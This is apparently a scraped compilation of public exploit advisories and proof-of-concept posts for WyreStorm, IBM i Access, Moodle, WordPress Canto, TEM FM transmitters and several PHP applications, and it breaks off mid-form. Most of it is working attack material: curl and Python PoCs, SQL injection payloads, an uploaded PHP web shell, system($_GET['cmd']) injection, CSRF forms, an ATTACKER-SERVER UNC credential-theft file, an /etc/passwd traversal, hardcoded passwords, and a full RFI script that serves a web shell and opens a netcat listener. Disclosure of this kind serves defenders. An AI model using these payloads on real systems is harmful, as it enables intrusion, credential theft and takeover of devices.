ISHACK AI BOT

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.wyrestorm.com [Product] APOLLO VX20 < 1.3.58 [Vulnerability Type] Incorrect Access Control (DOS) [Affected Product Code Base] APOLLO VX20 < 1.3.58, fixed in v1.3.58 [Affected Component] Web interface, reboot and reset commands [CVE Reference] CVE-2024-25736 [Security Issue] An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request. [Exploit/POC] curl -k https://192.168.x.x/device/reboot [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: January 18, 2024 Vendor released fixed firmware v1.3.58: February 2, 2024 February 11, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.wyrestorm.com [Product] APOLLO VX20 < 1.3.58 [Vulnerability Type] Incorrect Access Control (Credentials Disclosure) [Affected Component] Web interface, config [Affected Product Code Base] APOLLO VX20 < 1.3.58, fixed in v1.3.58 [CVE Reference] CVE-2024-25735 [Security Issue] An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request. The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config E.g. HTTP response snippet: :{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"} ,"softAp":{"password":"12345678","router":"y","softAp":"y"}... [Exploit/POC] import requests target="https://x.x.x.x" res = requests.get(target+"/device/config", verify=False) idx=res.content.find('{"password":') if idx != -1: idx2=res.content.find('router') if idx2 != -1: print("[+] CVE-2024-25735 Credentials Disclosure") print("[+] " + res.content[idx + 1:idx2 + 11]) print("[+] hyp3rlinx") else: print("[!] Apollo vX20 Device not vulnerable...") [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: January 18, 2024 Vendor released fixed firmware v1.3.58: February 2, 2024 February 11, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.ibm.com [Product] IBM i Access Client Solutions [Versions] All [Remediation/Fixes] None [Vulnerability Type] Remote Credential Theft [CVE Reference] CVE-2024-22318 [Security Issue] IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations. Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server. If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session. The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials. [References] https://www.ibm.com/support/pages/node/7116091 [Exploit/POC] The client access .HOD File vulnerable parameters: 1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c [KeyRemapFile] 2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv The client access legacy .WS File vulnerable parameters: DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c Example, client access older .WS file [Profile] ID=WS Version=9 [Telnet5250] AssociatedPrinterStartMinimized=N AssociatedPrinterTimeout=0 SSLClientAuthentication=Y HostName=PWN AssociatedPrinterClose=N Security=CA400 CertSelection=AUTOSELECT AutoReconnect=Y [KeepAlive] KeepAliveTimeOut=0 [Keyboard] IBMDefaultKeyboard=N DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c [Communication] Link=telnet5250 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: December 14, 2023 Vendor Addresses Issue: February 7, 2024 February 8, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

## Title: dawa-pharma-1.0-2022 Multiple-SQLi ## Author: nu11secur1ty ## Date: 10/12/2023 ## Vendor: https://www.mayurik.com/ ## Software: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The email parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+' was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all the information for the clients of this application from the server, and very sensitive information for accessing the server by exploiting the vulnerability. [+]Payload: ```MySQL --- Parameter: email (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: email=-8698' OR 5305=5305-- vvuH&password=mayurik&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]'+(select load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+'' AND (SELECT 4515 FROM (SELECT(SLEEP(15)))KUth)-- VRdC&password=mayurik&login= --- ``` ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/dawa-pharma-1.0-2022 System Administrator - Infrastructure Engineer Penetration Testing Engineer home page: https://www.nu11secur1ty.com/

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE # Date: 16.10.2023 # Exploit Author: Çağatay Ceyhan # Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette # Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database # Version: 1.0 # Tested on: Windows 11 ## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication. POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1 Host: localhost Content-Length: 6162 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="animal_id" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_given_name" kdkd ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_species_name" ıdsıd ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_dob" 1552-02-05 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_gender" m ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_avg_lifespan" 3 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="class_id" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="location_id" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_dietary_req" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_natural_habitat" faad ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_pop_dist" eterter ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_joindate" 5559-02-06 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_height" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_weight" 3 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_description" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="images[]"; filename="ultra.php" Content-Type: application/octet-stream <?php if (!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd']); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Web Shell</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box; } body { font-family: sans-serif; color: rgba(0, 0, 0, .75); } main { margin: auto; max-width: 850px; } pre, input, button { padding: 10px; border-radius: 5px; background-color: #efefef; } label { display: block; } input { width: 100%; background-color: #efefef; border: 2px solid transparent; } input:focus { outline: none; background: transparent; border: 2px solid #e6e6e6; } button { border: none; cursor: pointer; margin-left: 5px; } button:hover { background-color: #e6e6e6; } .form-group { display: -webkit-box; display: -ms-flexbox; display: flex; padding: 15px 0; } </style> </head> <body> <main> <h1>Web Shell</h1> <h2>Execute a command</h2> <form method="post"> <label for="cmd"><strong>Command</strong></label> <div class="form-group"> <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required> <button type="submit">Execute</button> </div> </form> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?> <h2>Output</h2> <?php if (isset($cmd)): ?> <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre> <?php else: ?> <pre><small>No result.</small></pre> <?php endif; ?> <?php endif; ?> </main> </body> </html> ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_med_record" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_transfer" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_transfer_reason" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_death_date" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_death_cause" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_incineration" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="m_gest_period" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="m_category" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="m_avg_body_temp" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_nest_const" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_clutch_size" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_wingspan" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_color_variant" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="f_body_temp" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="f_water_type" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="f_color_variant" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="rep_type" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="clutch_size" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="num_offspring" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="submit" ------WebKitFormBoundary8NY8zT5dXIloiUML-- ## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.

# Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR) # Date: 20/10/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://moodle.org/ # Software Demo: https://school.moodledemo.net/ # Version: 4.3+ # Tested on: Linux Vulnerability Details ====================== Steps : 1. Log in to the application with the given credentials > USER: teacher PASS: moodle 2. In profile.php?id=11, modify the id Parameter to View User details, Email address, Country, City/town, City, Timezone 3. Change the existing "id" value to another number https://school.moodledemo.net/user/profile.php?id=4 https://school.moodledemo.net/user/profile.php?id=5 https://school.moodledemo.net/user/profile.php?id=10 https://school.moodledemo.net/user/profile.php?id=50 https://school.moodledemo.net/blog/index.php?userid=3 https://school.moodledemo.net/blog/index.php?userid=14 https://school.moodledemo.net/mod/forum/user.php?id=53 https://school.moodledemo.net/mod/forum/user.php?id=50

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities .:. Google Dorks .:. "designed and built by Joe Iz." "Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman." inurl:/superstorefinder/index.php .:. Date: 0ctober 13, 2023 .:. Exploit Author: bRpsd .:. Contact: cy[at]live.no .:. Vendor -> https://www.superstorefinder.net/ .:. Product -> https://codecanyon.net/item/super-store-finder/3630922 .:. Product Version -> [3.7 and below] .:. DBMS -> MySQL .:. Tested on > macOS [*nix Darwin Kernel], on local xampp @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############# |DESCRIPTION| ############# "Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations" Vulnerability 1: Unauthenticated SQL Injection Types: boolean-based blind,error-based, time-based blind File: localhost/admin/index.php Vul Parameter: USERNAME [POST] =========================================================================================== Vulnerability 1: Unauthenticated SQL Injection Types: boolean-based blind,error-based, time-based blind File: localhost/admin/index.php Vul Parameter: USERNAME [POST] Test #1 http://localhost:9000/adminstorefinder/admin/index.php username=a'&password=1&btn_login=Login Response Error: Array ( [0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1 ) SELECT users.* FROM users WHERE users.username='admin'' =========================================================================================== Test #2 => Payload (Proof Of Concept) http://localhost:9000/adminstorefinder/admin/index.php username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj &password=1&btn_login=Login Response Error: Array ( [0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist ) =========================================================================================== ====================================================================================================================================================================================== Vulnerability 2: Authenticated PHP Injection - Remote Code Exectuion File: localhost/admin/settings.php Vul Parameter: language_set [POST] Proof of concept: http://localhost:9000/superstorefinder/admin/settings.php langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1 Index.php included in the config.inc.php , we just can go for rce with GET parameter ?cmd= http://localhost:9000/?cmd=uname -a Reponse: 22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64 =========================================================================================== =========================================================================================== Vulnerability 3: Cross Site Request Forgery Risk: It can lead to Privilege Escalation through adding admins or changing admin password. Affected Files (1): localhost/superstorefinder/admin/users_add.php Parameters: username,password,cpassword Proof of concept: <iframe style="display:none" name="CSRF"></iframe> <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF"> <input name="submit_hidden" value="submit_hidden" type="hidden" /> <input type='hidden' name='username' value='X'>        <input type='hidden' name='password' value='123'> <input type='hidden' name='cpassword' value='123'> <input type='hidden' value='submit'> </form> <script>document.getElementById("CSRF").submit()</script>       <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe> Affected Files (2:):localhost/superstorefinder/admin/change_password.php Parameters: password,cpassword,save Proof of concept: <iframe style="display:none" name="CSRF"></iframe> <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF"> <input type='hidden' name='password' value='123'>        <input type='hidden' name='cpassword' value='123'> <input type='hidden' name="save=" value='save'> </form> <script>document.getElementById("CSRF").submit()</script>       <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe> ======================================================================================

# Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal # Google Dork: # Date: 12/9/2023 # Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure # Vendor Homepage: http://automatic-systems.com # Software Link: # Version: V06 # Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a # CVE : CVE-2023-37607 Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd

# Exploit Title: Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin # Google Dork: # Date: 12/9/2023 # Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure # Vendor Homepage: http://automatic-systems.com # Software Link: # Version: V06 # Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a # CVE : CVE-2023-37608 An issue in Automatic Systems SOC FL9600 FastLine version:V06 a remote attacker to obtain sensitive information via the admin login credentials. The device contains hardcoded login and password for super admin. The administrator cannot change the password for this account. Login: automaticsystems Password: astech

# Exploit Title: Executables Created with perl2exe <= V30.10C - Arbitrary Code Execution # Date: 10/17/2023 # Exploit Author: decrazyo # Vendor Homepage: https://www.indigostar.com/ # Software Link: https://www.indigostar.com/download/p2x-30.10-Linux-x64-5.30.1.tar.gz # Version: <= V30.10C # Tested on: Ubuntu 22.04 # Description: perl2exe packs perl scripts into native executables. Those executables use their 0th argument to locate a file to unpack and execute. Because of that, such executables can be made to execute another executable that has been compiled with perl2exe by controlling the 0th argument. That can be useful for breaking out of restricted shell environments. # Proof and Concept: user@testing:~/example$ ls p2x-30.10-Linux-x64-5.30.1.tar.gz perl2exe-Linux-x64-5.30.1 user@testing:~/example$ user@testing:~/example$ # Create and pack a "safe" perl script to target with the attack. user@testing:~/example$ echo 'print("I am completely safe\n");' > safe.pl user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe safe.pl Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software ... Generating safe user@testing:~/example$ user@testing:~/example$ # Check that the program executes as expected. user@testing:~/example$ ./safe I am completely safe user@testing:~/example$ user@testing:~/example$ # Create and pack a "malicious" script that we want to execute. user@testing:~/example$ echo 'print("j/k I am malicious AF\n");system("/bin/sh");' > malicious.pl user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe malicious.pl Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software ... Generating malicious user@testing:~/example$ user@testing:~/example$ # Our "malicious" file doesn't need to have execution permissions. user@testing:~/example$ chmod -x malicious user@testing:~/example$ ./malicious -bash: ./malicious: Permission denied user@testing:~/example$ user@testing:~/example$ # Execute the "safe" program with the name of the "malicious" program as the 0th argument. user@testing:~/example$ # The "safe" program will unpack and execute the "malicious" program instead of itself. user@testing:~/example$ bash -c 'exec -a malicious ./safe' j/k I am malicious AF $ pstree -s $$ systemd───sshd───sshd───sshd───bash───safe───sh───pstree $

# Exploit Title: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE) # Date: 04/11/2023 # Exploit Author: Leopoldo Angulo (leoanggal1) # Vendor Homepage: https://wordpress.org/plugins/canto/ # Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip # Version: All versions of Canto Plugin prior to 3.0.5 # Tested on: Ubuntu 22.04, Wordpress 6.3.2, Canto Plugin 3.0.4 # CVE : CVE-2023-3452 #PoC Notes: #The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452) #This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code: #... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ... #This is just an example but there is this same misconfiguration in other lines of the vulnerable plugin files. # More information in Leoanggal1's Github #!/usr/bin/python3 import argparse import http.server import socketserver import threading import requests import os import subprocess # Define the default web shell default_web_shell = "<?php system($_GET['cmd']); ?>" def create_admin_file(local_dir, local_shell=None): if not os.path.exists(local_dir): os.makedirs(local_dir) # If a local shell is provided, use it; otherwise, use the default web shell if local_shell: with open(f"{local_dir}/admin.php", "wb") as admin_file: with open(local_shell, "rb") as original_file: admin_file.write(original_file.read()) else: with open(f"{local_dir}/admin.php", "w") as admin_file: admin_file.write(default_web_shell) def start_local_server(local_port): Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler) print(f"Local web server on port {local_port}...") httpd.serve_forever() return httpd def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port): local_dir = "wp-admin" create_admin_file(local_dir, local_shell) target_url = f"{url}/wp-content/plugins/canto/includes/lib/download.php" local_server = f"http://{local_host}:{local_port}" command = f"cmd={command}" if local_shell: # If a local shell is provided, start netcat on the specified port subprocess.Popen(["nc", "-lvp", str(nc_port)]) server_thread = threading.Thread(target=start_local_server, args=(local_port,)) server_thread.daemon = True server_thread.start() exploit_url = f"{target_url}?wp_abspath={local_server}&{command}" print(f"Exploitation URL: {exploit_url}") response = requests.get(exploit_url) print("Server response:") print(response.text) # Shutdown the local web server print("Shutting down local web server...") server_thread.join() if __name__ == "__main__": examples = ''' Examples: - Check the vulnerability python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 - Execute a command python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id' - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom. python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php ''' parser = argparse.ArgumentParser(description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452", epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("-u", "--url", required=True, default=None, help="Vulnerable URL") parser.add_argument("-s", "--shell", help="Local file for web shell") parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP") parser.add_argument("-LPORT", "--local_port", help="Local web server port") parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target") parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat") try: args = parser.parse_args() if args.local_port is None: args.local_port = 8080 # Valor predeterminado si LPORT no se proporciona exploit_rfi(args.url, args.shell, args.local_host, int(args.local_port), args.command, args.nc_port) except SystemExit: parser.print_help()

TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l. Product web page: https://www.tem-italy.it Affected version: Software version: 35.45 Webserver version: 1.7 Summary: This new line of Opera plus FM Transmitters combines very high efficiency, high reliability and low energy consumption in compact solutions. They have innovative functions and features that can eliminate the costs required by additional equipment: automatic exchange of audio sources, built-in stereo encoder, integrated RDS encoder, parallel I/O card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP Webserver. Desc: The device allows access to an unprotected endpoint that allows MPFS File System binary image upload without authentication. The MPFS2 file system module provides a light-weight read-only file system that can be stored in external EEPROM, external serial Flash, or internal Flash program memory. This file system serves as the basis for the HTTP2 web server module, but is also used by the SNMP module and is available to other applications that require basic read-only storage capabilities. This can be exploited to overwrite the flash program memory that holds the web server's main interfaces and execute arbitrary code. Tested on: Webserver Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5799 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5799.php 18.08.2023 -- POST /mpfsupload HTTP/1.1 Host: 192.168.1.2:8000 Content-Length: 251 Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----joxypoxy2 User-Agent: MPFS2_PoC/2.0c Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------joxypoxy2 Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin" Content-Type: application/octet-stream MPFS...<CGI BINARY PHONE HOME> -----joxypoxy2-- HTTP/1.1 200 OK Connection: close Content-Type: text/html <html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>

<!-- TEM Opera Plus FM Family Transmitter 35.45 XSRF Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l. Product web page: https://www.tem-italy.it Affected version: Software version: 35.45 Webserver version: 1.7 Summary: This new line of Opera plus FM Transmitters combines very high efficiency, high reliability and low energy consumption in compact solutions. They have innovative functions and features that can eliminate the costs required by additional equipment: automatic exchange of audio sources, built-in stereo encoder, integrated RDS encoder, parallel I/O card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP Webserver. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Webserver Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5800 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5800.php 18.08.2023 --> CSRF Change Forward Power: ------------------------- <html> <body> <form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain"> <input type="hidden" name="Pwr" value="00100" /> <input type="submit" value="Change" /> </form> </body> </html> CSRF Change Frequency: --------------------- <html> <body> <form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain"> <input type="hidden" name="Freq" value="95&#46;5" /> <input type="submit" value="Change" /> </form> </body> </html> CSRF Change User/Pass/Priv Change Admin/User/Pass: ------------------------------------------------- <html> <body> <form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST"> <input type="hidden" name="usr0" value="admin" /> <input type="hidden" name="psw0" value="admin" /> <input type="hidden" name="usr1" value="operator1" /> <input type="hidden" name="psw1" value="operator1" /> <input type="hidden" name="lev1" value="1" /> <input type="hidden" name="usr2" value="operator2" /> <input type="hidden" name="psw2" value="operator2" /> <input type="hidden" name="lev2" value="1" /> <input type="hidden" name="usr3" value="consulter1" /> <input type="hidden" name="psw3" value="consulter1" /> <input type="hidden" name="lev3" value="2" /> <input type="hidden" name="usr4" value="consulter2" /> <input type="hidden" name="psw4" value="consulter2" /> <input type="hidden" 